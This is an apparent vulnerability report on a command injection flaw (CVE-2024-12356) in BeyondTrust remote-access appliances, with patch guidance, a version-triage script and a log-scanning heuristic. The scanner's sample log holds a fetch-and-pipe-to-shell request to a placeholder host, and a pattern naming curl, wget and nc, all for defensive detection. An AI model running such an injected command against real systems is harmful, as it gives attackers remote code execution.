Full Report
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a critical security flaw impacting BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) products to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The vulnerability, tracked as CVE-2024-12356 (CVSS score: 9.8), is a command injection flaw that
Analysis Summary
# Vulnerability: Critical Command Injection in BeyondTrust Privileged Remote Access and Remote Support
## CVE Details
- CVE ID: CVE-2024-12356
- CVSS Score: 9.8 (Critical)
- CWE: CWE-77, Improper Neutralization of Special Elements used in a Command ("Command Injection"). The source does not state a CWE; this classification is inferred from the vendor's description of the flaw.
## Affected Systems
- Products: BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS)
- Versions: Versions 24.3.1 and earlier (for self-hosted/on-premises versions)
- Configurations: Self-hosted/on-premises installations are highlighted as needing updates. Cloud instances were reportedly patched by the vendor.
## Vulnerability Description
This is a critical command injection vulnerability in BeyondTrust PRA and RS. An unauthenticated remote attacker who can reach the appliance can send a crafted client request that injects operating-system commands, which are then executed in the context of the appliance's 'site user'. No credentials or user interaction are required.
## Exploitation
- Status: Actively exploited in the wild (Added to CISA KEV catalog)
- Complexity: Not stated in the source. A CVSS 3.1 base score of 9.8 corresponds to the vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, i.e. low attack complexity with no privileges or user interaction required.
- Attack Vector: Network. PRA and RS are remote-access products whose client-facing interface is reachable over the network by design, and the flaw is triggered by a crafted client request.
## Impact
- Confidentiality: High (arbitrary command execution as the site user exposes session data, credentials and configuration held by the appliance)
- Integrity: High (the attacker can alter appliance state, configuration and the commands it runs)
- Availability: High (injected commands can disrupt or disable the remote-access service)
*(Note: the source does not itemise the C/I/A sub-scores; the ratings above are those implied by the 9.8 base score.)*
## Remediation
### Patches
- **Privileged Remote Access (PRA):** Self-hosted appliances running 24.3.1 or earlier are vulnerable (the affected range is inclusive of 24.3.1). Apply patch `BT24-10-ONPREM1` or `BT24-10-ONPREM2`.
- **Remote Support (RS):** Self-hosted appliances running 24.3.1 or earlier are vulnerable (the affected range is inclusive of 24.3.1). Apply patch `BT24-10-ONPREM1` or `BT24-10-ONPREM2`.
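The version boundary above is the detail most likely to be read wrong: 24.3.1 itself is in the affected range, and cloud instances are out of scope because the vendor patched them. The following is an added example, not BeyondTrust code or tooling, of how a practitioner would triage an appliance inventory against the advisory. The inventory format, field names and hostnames are constructed for illustration.

```python
"""Fleet triage for CVE-2024-12356: which self-hosted PRA/RS appliances
still need the BT24-10-ONPREM patch.

Added example, not BeyondTrust code. The inventory layout and hostnames
are constructed for illustration.
"""
import re

# Per the vendor advisory, 24.3.1 and earlier are affected (inclusive).
LAST_VULNERABLE = (24, 3, 1)
# Patch identifiers that remediate the flaw on self-hosted appliances.
FIXING_PATCHES = {"BT24-10-ONPREM1", "BT24-10-ONPREM2"}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text):
    """'24.3.1' -> (24, 3, 1); '24.2' -> (24, 2, 0). ValueError otherwise."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def needs_patch(product, version, deployment, applied_patches=()):
    """Return True when an appliance is still exposed.

    Cloud instances were patched by the vendor, so only self-hosted
    deployments are in scope. Tuple comparison makes the boundary
    explicit: 24.3.1 is vulnerable, anything later is outside the
    stated affected range.
    """
    if product not in {"PRA", "RS"}:
        raise ValueError(f"unknown product {product!r}")
    if deployment != "self-hosted":
        return False
    if parse_version(version) > LAST_VULNERABLE:
        return False
    # Still in the affected range: exposed unless a fixing patch is applied.
    return not (set(applied_patches) & FIXING_PATCHES)


def triage(inventory):
    """inventory: iterable of dicts with host, product, version,
    deployment and patches. Returns sorted hosts still needing action."""
    return sorted(
        h["host"]
        for h in inventory
        if needs_patch(h["product"], h["version"], h["deployment"],
                       h.get("patches", ()))
    )


# Constructed sample inventory; hostnames are placeholders.
SAMPLE_INVENTORY = [
    {"host": "pra-01.example.internal", "product": "PRA", "version": "24.3.1",
     "deployment": "self-hosted", "patches": []},
    {"host": "pra-02.example.internal", "product": "PRA", "version": "24.3.1",
     "deployment": "self-hosted", "patches": ["BT24-10-ONPREM2"]},
    {"host": "rs-01.example.internal", "product": "RS", "version": "24.2.4",
     "deployment": "self-hosted", "patches": []},
    {"host": "rs-02.example.internal", "product": "RS", "version": "24.3.2",
     "deployment": "self-hosted", "patches": []},
    {"host": "rs-cloud.example.internal", "product": "RS", "version": "24.3.1",
     "deployment": "cloud", "patches": []},
]

if __name__ == "__main__":
    for host in triage(SAMPLE_INVENTORY):
        print("NEEDS PATCH:", host)
```

Feed `triage()` an export from whatever asset inventory tracks the appliances; the strict `>` comparison against `LAST_VULNERABLE` is what keeps 24.3.1 in scope, and an unparseable version string raises rather than silently passing.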
### Workarounds
The source describes no vendor-endorsed workaround. Restricting network access to the appliance's client-facing interface reduces exposure but does not remove the flaw; given active exploitation, immediate patching is the course of action for self-hosted deployments.
## Detection
- **Indicators of Compromise:** The source lists no specific IOCs. Review the appliance's web and application logs for requests carrying shell metacharacters or percent-encoded command fragments in parameters, look for unexpected child processes or shells spawned under the site user, and investigate unexpected outbound connections from the PRA/RS appliance.
- **Detection Methods and Tools:** Monitor application logs for unexpected or encoded command strings in requests to the appliance, and treat any self-hosted appliance at 24.3.1 or earlier without `BT24-10-ONPREM1` or `BT24-10-ONPREM2` as exposed until patched.
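The log review suggested above, as an added example that is not BeyondTrust code and not a signature for the actual CVE-2024-12356 payload (which the source does not describe): a heuristic pass over web-access-style log lines that percent-decodes each query parameter, repeatedly, and flags values containing shell metacharacters or a common post-exploitation binary following a separator. The log format, request paths and addresses are constructed; the parser must be adapted to the appliance's real log format.

```python
"""Heuristic review of web-access-style logs for command-injection
attempts against a PRA/RS appliance.

Added example, not BeyondTrust code and not a signature for the real
CVE-2024-12356 payload. Log format, paths and addresses are constructed.
"""
import re
from urllib.parse import unquote

# Shell control characters and constructs that have no business in a
# legitimate parameter value for these products.
META_RE = re.compile(r"[;|&`]|\$\(|\$\{|>\s*/")
# A common post-exploitation binary directly after a separator.
BINARY_RE = re.compile(
    r"(?:^|[;|&`(\s])(?:sh|bash|curl|wget|python3?|perl|nc)\b")
# Combined-Log-Format-style line; adapt to the appliance's real format.
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample lines (not real BeyondTrust logs). Line 2 carries a
# single-encoded pipeline, line 3 a double-encoded $(...), line 4 a
# benign value whose encoded '&' will produce a low-confidence hit.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Dec/2024:10:01:02 +0000] "GET /login?username=alice HTTP/1.1" 200 512
203.0.113.7 - - [16/Dec/2024:10:01:09 +0000] "GET /api/session?id=abc123;curl%20http://198.51.100.9/x%7Csh HTTP/1.1" 500 0
203.0.113.7 - - [16/Dec/2024:10:01:15 +0000] "GET /api/session?id=%2524%2528id%2529 HTTP/1.1" 500 0
10.0.0.8 - - [16/Dec/2024:10:02:00 +0000] "GET /search?q=printer%20%26%20scanner HTTP/1.1" 200 2048
"""


def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (double encoding is a classic way past
    naive filters). Stops once decoding no longer changes the string."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_query(query):
    """Split on the raw '&' only: ';' is one of the characters we are
    looking for, so it must not be treated as a parameter separator."""
    params = []
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.append((fully_decode(name), fully_decode(value)))
    return params


def scan_line(line):
    """Return a list of findings (possibly empty) for one log line."""
    m = LINE_RE.match(line)
    if not m or "?" not in m.group("target"):
        return []
    path, _, query = m.group("target").partition("?")
    findings = []
    for name, value in parse_query(query):
        reasons = []
        if META_RE.search(value):
            reasons.append("shell-metachar")
        if BINARY_RE.search(value):
            reasons.append("binary-after-separator")
        if reasons:
            findings.append({
                "src": m.group("src"), "path": path, "param": name,
                "decoded_value": value, "status": int(m.group("status")),
                "reasons": reasons,
                # A metacharacter alone is weak evidence; a binary after a
                # separator is what distinguishes an attempt from noise.
                "confidence": "high" if "binary-after-separator" in reasons else "low",
            })
    return findings


def scan_log(text):
    return [f for line in text.splitlines() for f in scan_line(line)]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["confidence"], f["src"], f["path"], f["param"], repr(f["decoded_value"]), f["reasons"])
```

Expect false positives from legitimately encoded `&` in free-text fields (the fourth sample line); the returned `status` and `src` fields are there so an analyst can prioritise 5xx responses and external sources, and the `high` tier, a binary following a separator, is the one worth paging on.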
## References
- [CISA Adds One Known Exploited Vulnerability to Catalog](https://www.cisa.gov/news-events/alerts/2024/12/19/cisa-adds-one-known-exploited-vulnerability-catalog)
- [BeyondTrust Security Investigation Update (BT24-11)](https://www.beyondtrust.com/trust-center/security-advisories/bt24-11)
- [The Hacker News coverage of CVE-2024-12356 (general context)](https://thehackernews.com/2024/12/beyondtrust-issues-urgent-patch-for.html)